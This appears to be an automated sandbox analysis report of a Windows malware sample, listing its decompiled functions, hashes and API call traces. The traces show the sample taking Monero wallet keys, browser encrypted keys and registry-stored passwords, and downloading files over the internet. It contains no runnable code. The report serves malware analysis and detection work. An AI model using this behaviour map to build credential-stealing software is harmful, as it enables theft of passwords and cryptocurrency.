                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 8569761c41ccb1cf26171d530374e50d9bf2a5d7ab7ea13b193e0fb183c34019
                              • Instruction ID: c61955df1d089930f8bd455ae15047b85c22c3c195a5e4b9cff33fe6bea3f012
                              • Opcode Fuzzy Hash: 8569761c41ccb1cf26171d530374e50d9bf2a5d7ab7ea13b193e0fb183c34019
                              • Instruction Fuzzy Hash: BA51A8709101489BDB18EFA8C996AED7779FF50301F514028E90AEB591EF346B46CFA3
                              Function 008612D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 0e022b64461f98a89aef800c978b0656ab9fcd6c28865fcb86e77f0f1c809531
                              • Instruction ID: de1d2ae0cda17c2d7f13c0d468aacdb493ff23d5de17b477efd51369e5ca28d4
                              • Opcode Fuzzy Hash: 0e022b64461f98a89aef800c978b0656ab9fcd6c28865fcb86e77f0f1c809531
                              • Instruction Fuzzy Hash: 83C1A8B5A001199BCF14EFA4DC89FEA7778FB64304F014599F50AE7281DE70AA85CF92
                              Function 00864280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00868DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00868E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 008642EC
                              • lstrcat.KERNEL32(?,015CD988), ref: 0086430B
                              • lstrcat.KERNEL32(?,?), ref: 0086431F
                              • lstrcat.KERNEL32(?,015CCBB8), ref: 00864333
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 00868D90: GetFileAttributesA.KERNEL32(00000000,?,00851B54,?,?,0087564C,?,?,00870E1F), ref: 00868D9F
                                • Part of subcall function 00859CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00859D39
                                • Part of subcall function 008599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008599EC
                                • Part of subcall function 008599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00859A11
                                • Part of subcall function 008599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00859A31
                                • Part of subcall function 008599C0: ReadFile.KERNEL32(000000FF,?,00000000,0085148F,00000000), ref: 00859A5A
                                • Part of subcall function 008599C0: LocalFree.KERNEL32(0085148F), ref: 00859A90
                                • Part of subcall function 008599C0: CloseHandle.KERNEL32(000000FF), ref: 00859A9A
                                • Part of subcall function 008693C0: GlobalAlloc.KERNEL32(00000000,008643DD,008643DD), ref: 008693D3
                              • StrStrA.SHLWAPI(?,015CD8E0), ref: 008643F3
                              • GlobalFree.KERNEL32(?), ref: 00864512
                                • Part of subcall function 00859AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00854EEE,00000000,00000000), ref: 00859AEF
                                • Part of subcall function 00859AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00854EEE,00000000,?), ref: 00859B01
                                • Part of subcall function 00859AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00854EEE,00000000,00000000), ref: 00859B2A
                                • Part of subcall function 00859AC0: LocalFree.KERNEL32(?,?,?,?,00854EEE,00000000,?), ref: 00859B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 008644A3
                              • StrCmpCA.SHLWAPI(?,008708D1), ref: 008644C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 008644D2
                              • lstrcat.KERNEL32(00000000,?), ref: 008644E5
                              • lstrcat.KERNEL32(00000000,00870FB8), ref: 008644F4
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 8141fb6a5d1c672a6afb81b46059f3271787b0bdb9f297bb7ed1f1049ed793d4
                              • Instruction ID: e76d8bd55f88eed250f03ce1c6612aafa6d22fda036934de14e070162f5c086a
                              • Opcode Fuzzy Hash: 8141fb6a5d1c672a6afb81b46059f3271787b0bdb9f297bb7ed1f1049ed793d4
                              • Instruction Fuzzy Hash: CA711376910208A7DB14EBE4DC89FEE7779FB58300F048599E509A7181EE34DA49CF92
                              Function 00851310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008512A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008512B4
                                • Part of subcall function 008512A0: RtlAllocateHeap.NTDLL(00000000), ref: 008512BB
                                • Part of subcall function 008512A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008512D7
                                • Part of subcall function 008512A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008512F5
                                • Part of subcall function 008512A0: RegCloseKey.ADVAPI32(?), ref: 008512FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0085134F
                              • lstrlen.KERNEL32(?), ref: 0085135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00851377
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 00868B60: GetSystemTime.KERNEL32(00870E1A,015CA088,008705AE,?,?,008513F9,?,0000001A,00870E1A,00000000,?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 00868B86
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00851465
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 008599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008599EC
                                • Part of subcall function 008599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00859A11
                                • Part of subcall function 008599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00859A31
                                • Part of subcall function 008599C0: ReadFile.KERNEL32(000000FF,?,00000000,0085148F,00000000), ref: 00859A5A
                                • Part of subcall function 008599C0: LocalFree.KERNEL32(0085148F), ref: 00859A90
                                • Part of subcall function 008599C0: CloseHandle.KERNEL32(000000FF), ref: 00859A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 008514EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: ed4472bca53511d1397619a0b057f1c2887a5016c0c7dce923c0dfab724e2dc8
                              • Instruction ID: a18a5790aecb32f95e9a4fed8219d3554cd2cc00357e0bb0d148841d26a0e88f
                              • Opcode Fuzzy Hash: ed4472bca53511d1397619a0b057f1c2887a5016c0c7dce923c0dfab724e2dc8
                              • Instruction Fuzzy Hash: B25130B195011897CB19EB64DD92BED733CFB50300F4141A9B60AF2081EE305B89CFA7
                              Function 008575D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008572D0: memset.MSVCRT ref: 00857314
                                • Part of subcall function 008572D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0085733A
                                • Part of subcall function 008572D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008573B1
                                • Part of subcall function 008572D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0085740D
                                • Part of subcall function 008572D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00857452
                                • Part of subcall function 008572D0: HeapFree.KERNEL32(00000000), ref: 00857459
                              • lstrcat.KERNEL32(00000000,008717FC), ref: 00857606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00857648
                              • lstrcat.KERNEL32(00000000, : ), ref: 0085765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0085768F
                              • lstrcat.KERNEL32(00000000,00871804), ref: 008576A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 008576D3
                              • lstrcat.KERNEL32(00000000,00871808), ref: 008576ED
                              • task.LIBCPMTD ref: 008576FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: :
                              • API String ID: 3191641157-3653984579
                              • Opcode ID: 88035deafd6078a864bf50cad892ad4ab90214a50823b1a50f2ff56113300487
                              • Instruction ID: 3a0bbe26a6aabfc0f70523f24d8fe8b93f55d674164317ad0ada75784281a5a2
                              • Opcode Fuzzy Hash: 88035deafd6078a864bf50cad892ad4ab90214a50823b1a50f2ff56113300487
                              • Instruction Fuzzy Hash: 36311E71A10109DBCF04EBF8DC95DEE7778FB64306B14811AE516E7290DE34A94BCB92
                              Function 008572D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 00857314
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0085733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008573B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0085740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00857452
                              • HeapFree.KERNEL32(00000000), ref: 00857459
                              • task.LIBCPMTD ref: 00857555
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: Password
                              • API String ID: 2808661185-3434357891
                              • Opcode ID: f3cc514c642fe01c390e42b91c946d6a743d8cacb1fc6768f96e4b71804752d7
                              • Instruction ID: c94f724466ddd9fa460093bb46c21099148ac7c121290ad1766f38f0a43affea
                              • Opcode Fuzzy Hash: f3cc514c642fe01c390e42b91c946d6a743d8cacb1fc6768f96e4b71804752d7
                              • Instruction Fuzzy Hash: 99612BB5904268DBDB24DB54DC45BDAB7B8FF44301F0081EAEA89A6141EF705BC9CFA1
                              Function 00868100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,015CDEF8,00000000,?,00870E2C,00000000,?,00000000), ref: 00868130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00868137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00868158
                              • __aulldiv.LIBCMT ref: 00868172
                              • __aulldiv.LIBCMT ref: 00868180
                              • wsprintfA.USER32 ref: 008681AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: 8bea1331c4ac51b787a2c8d6a6b71cecf440ac176adac7ee1db8e316f3c24862
                              • Instruction ID: 2e7028925040ff145bc6ee7a2f540ba977a7afa2afecc4cb20bc4d6649936a5b
                              • Opcode Fuzzy Hash: 8bea1331c4ac51b787a2c8d6a6b71cecf440ac176adac7ee1db8e316f3c24862
                              • Instruction Fuzzy Hash: F3211DB1E44318ABDB00DFD5CC49FAEB7B8FB44B14F10460AF615BB280DB7859018BA5
                              Function 008560A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 008547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00854839
                                • Part of subcall function 008547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00854849
                              • InternetOpenA.WININET(00870DF7,00000001,00000000,00000000,00000000), ref: 0085610F
                              • StrCmpCA.SHLWAPI(?,015CE4B0), ref: 00856147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0085618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008561B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 008561DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0085620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00856249
                              • InternetCloseHandle.WININET(?), ref: 00856253
                              • InternetCloseHandle.WININET(00000000), ref: 00856260
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: a4cbe5ff769f2e3fa75860d7fa142664da12c211b016b57caf9057d2a63edc32
                              • Instruction ID: 57c3a843ba977a31e377c75f38f71013ffee2d7abc2d1d6fd7a047c3e82f290c
                              • Opcode Fuzzy Hash: a4cbe5ff769f2e3fa75860d7fa142664da12c211b016b57caf9057d2a63edc32
                              • Instruction Fuzzy Hash: 39519370A00218ABDF20DF90CC45BEE7778FB44305F508199B605E71C0EB746A89CF96
                              Function 0085BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                              • lstrlen.KERNEL32(00000000), ref: 0085BC9F
                                • Part of subcall function 00868E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00868E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0085BCCD
                              • lstrlen.KERNEL32(00000000), ref: 0085BDA5
                              • lstrlen.KERNEL32(00000000), ref: 0085BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
